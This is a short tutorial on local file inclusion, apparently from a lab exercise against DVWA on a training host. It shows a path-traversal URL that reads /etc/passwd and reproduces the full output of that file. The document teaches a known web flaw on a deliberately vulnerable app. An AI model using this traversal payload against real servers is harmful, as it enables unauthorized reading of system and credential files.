LOCAL FILE INCLUSION

  • Allows an attacker to read ANY file on the same server.
  • Access files outside www directory.

Try to read  /etc/passwd file.

1. We know the current file path from the following error.

2. Try to visit following URL:

http://10.0.0.24/dvwa/vulnerabilities/fi/?page=/../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash bind:x:105:113::/var/cache/bind:/bin/false postfix:x:106:115::/var/spool/postfix:/bin/false ftp:x:107:65534::/home/ftp:/bin/false postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false distccd:x:111:65534::/:/bin/false user:x:1001:1001:just a user,111,,:/home/user:/bin/bash service:x:1002:1002:,,,:/home/service:/bin/bash telnetd:x:112:120::/nonexistent:/bin/false proftpd:x:113:65534::/var/run/proftpd:/bin/false statd:x:114:65534::/var/lib/nfs:/bin/false snmp:x:115:65534::/var/lib/snmp:/bin/false

最新文章

  1. [转]struct.pack 用法手记
  2. setTimeout用于取消多次执行mouseover或者mouseenter事件,间接实现hover的悬停加载的效果.
  3. wininet异步InternetReadFile和超时相关问题
  4. Thinkpad X240使用U盘安装Win7系统
  5. 如何在ASP.NET 5和XUnit.NET中进行LocalDB集成测试
  6. 【块状树】BZOJ 1086: [SCOI2005]王室联邦
  7. 关于Ionic的安装
  8. oldboy第五天学习
  9. 完整的拆分nginx访问日志
  10. A Game of Thrones(13) - Tyrion
  11. P1156 垃圾陷阱
  12. Java实现mongodb原生增删改查语句
  13. codeForces 472D 最小生成树
  14. Linux磁盘格式化
  15. linux 内核是什么?
  16. unity实现用鼠标右键控制摄像机视角上下左右移动
  17. 源码学习:一个express().get方法的加载与调用
  18. 理解js的DOM操作
  19. ssh连接提示 "Connection closed by remote host"
  20. java文档 第十一章 其他考量-b

热门文章

  1. CRC16冗余循环检测计算器-好用。modbus RTU
  2. visual studio 2005/2010/2013/2015/2017 vc++ c#代码编辑常用快捷键-代码编辑器的展开和折叠
  3. liunx 常用快捷键
  4. 图解 Git 基本命令 merge 和 rebase
  5. 使用itext asian 解决中文不显示的问题
  6. skywalking与pinpoint全链路追踪方案对比
  7. 黎活明8天快速掌握android视频教程--15_采用Pull解析器解析和生成XML内容
  8. java 加密与解密艺术二
  9. redis基础二----操作List类型
  10. 【Spring】@Transactional 闲聊